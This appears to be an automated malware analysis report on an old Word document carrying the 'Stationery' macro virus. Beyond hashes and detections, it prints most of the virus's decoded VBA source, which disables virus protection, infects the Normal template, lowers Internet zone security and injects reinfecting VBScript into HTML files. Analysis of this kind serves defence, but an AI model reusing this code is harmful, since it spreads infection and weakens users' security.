Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 17e0466521a0a001…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 40.5 KB
Created: 2000-07-18 04:09:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b596834641c423f5f9e9e3ecd2817b22
SHA-1: b43785f18694ce98a97b3f0346861685f816f8c8
SHA-256: 17e0466521a0a001ed893d8f307322040f5a57bc4bbb88bfed72f347d10d63f1
Risk Score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros that attempt to infect HTML files and modify registry settings. The macro code calls `CreateObject` and `GetObject`, which is indicative of malicious activity. The script also writes to registry keys related to 'Stationery' and Internet settings, suggesting an attempt to establish persistence or modify system behaviour. The ClamAV detection 'Doc.Trojan.Stationary-1' further supports the malicious nature of the file.

Heuristics 4

  • ClamAV: Doc.Trojan.Stationary-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Stationary-1
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
  • GetObject call (severity: high; rule: OLE_VBA_GETOBJ)
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 22877 bytes
SHA-256: 912b399dc2c047a0fa40c074ad8798d348fadc043f5eb9df35c0efb435047c2e
Detection: ClamAV: Doc.Trojan.Stationary-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Stationery
'v1.2, Residency :)
'by CyberShadow//SMF
Private Sub Document_Close()
 With Application
  .EnableCancelKey = False
  .ScreenUpdating = False
  .ShowVisualBasicEditor = False
 End With
 With Options
  .ConfirmConversions = False
  .SaveNormalPrompt = False
  .VirusProtection = False
 End With
 Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 If NT.Lines(1, 1) <> "'Stationery" Then
  NT.DeleteLines 1, NT.CountOfLines
  NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
 End If
 If AD.Lines(1, 1) <> "'Stationery" Then
  AD.DeleteLines 1, AD.CountOfLines
  AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
 End If
 CrStr = getname()
 Call compile(CryptedString, CrStr)
 Call CorrectLine(CryptedString, CrStr)
 a = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Shared Tools\Stationery", "Stationery Folder") + "\"
 System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = ""
 System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = ""
 Call infectHTML(a, CryptedString, CrStr)
End Sub
Private Sub infectHTML(a, CryptedString, CrStr)
 With Application.FileSearch
  .FileName = "*.htm"
  .MatchAllWordForms = True
  .LookIn = a
  .SearchSubFolders = True
  .Execute
  For i = 1 To .FoundFiles.Count
   c = .FoundFiles(i)
   Open c For Input As 1
    If LOF(1) > 55000 Then GoTo ExitRead
    e = ""
    Do While Not EOF(1)
     Line Input #1, a2
     d = a2
     If Len(d) >= 3 Then
      b = UCase(d)
      If b = "<HTML> <CYBERSHADOW...>" Then GoTo ExitRead
      If b = "<HTML>" Then b = "<html> <CyberShadow...>": d = b
      For j = 1 To Len(b) - 6
       If Mid$(b, j, 8) = "</BODY>" Then
        d = Left$(b, j + 7) + Chr$(13) + Chr$(10)
        d = d + "<body>" + Chr$(13) + Chr$(10)
        d = d + "<script language=""VBScript"">" + Chr$(13) + Chr$(10)
        d = d + "<!--" + Chr$(13) + Chr$(10)
        d = d + "On Error Resume Next" + Chr$(13) + Chr$(10)
        d = d + CryptedString + Chr$(13) + Chr$(10)
        d = d + "Dim FSO" + Chr$(13) + Chr$(10)
        d = d + "Set FSO = CreateObject(""Scripting.FileSystemObject"")" + Chr$(13) + Chr$(10)
        d = d + "Set WordObj = GetObject("""", ""Word.Application""): Quit = 0" + Chr$(13) + Chr$(10)
        d = d + "If WordObj = """" Then" + Chr$(13) + Chr$(10)
        d = d + "Set WordObj = CreateObject(""Word.Application""): Quit = 1" + Chr$(13) + Chr$(10)
        d = d + "End If" + Chr$(13) + Chr$(10)
        d = d + "Set NT = WordObj.Templates(1).VBProject.VBComponents(1).Codemodule" + Chr$(13) + Chr$(10)
        d = d + "If NT.Lines(1, 1) <> ""'Stationery"" Then" + Chr$(13) + Chr$(10)
        d = d + "WordObj.Options.SaveNormalPrompt = False" + Chr$(13) + Chr$(10)
        d = d + "NT.DeleteLines 1, NT.CountOfLines" + Chr$(13) + Chr$(10)
        d = d + "NT.InsertLines 1," + CrStr + Chr$(13) + Chr$(10)
        d = d + "End If" + Chr$(13) + Chr$(10)
        d = d + "Set NT = Nothing" + Chr$(13) + Chr$(10)
        d = d + "If Quit = 1 Then WordObj.Quit" + Chr$(13) + Chr$(10)
        d = d + "--></script>" + Chr$(13) + Chr$(10)
        d = d + "</body>" + Chr$(13) + Chr$(10)
        j = j + 7
        If (Len(b) - j - 7) > 0 Then d = d + Right$(b, Len(b) - j - 7)
       End If
      Next
     End If
     e = e + d + Chr$(13) + Chr$(10)
    Loop
    Close #1
    Open c For Output As 1
     Print #1, e
     identities = System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities", "Default User ID")
     System.PrivateProfileString("", "HKEY_CURRENT_USER\Identities\" + identities + "\Software\Microsoft\Outlook Expres
... (truncated)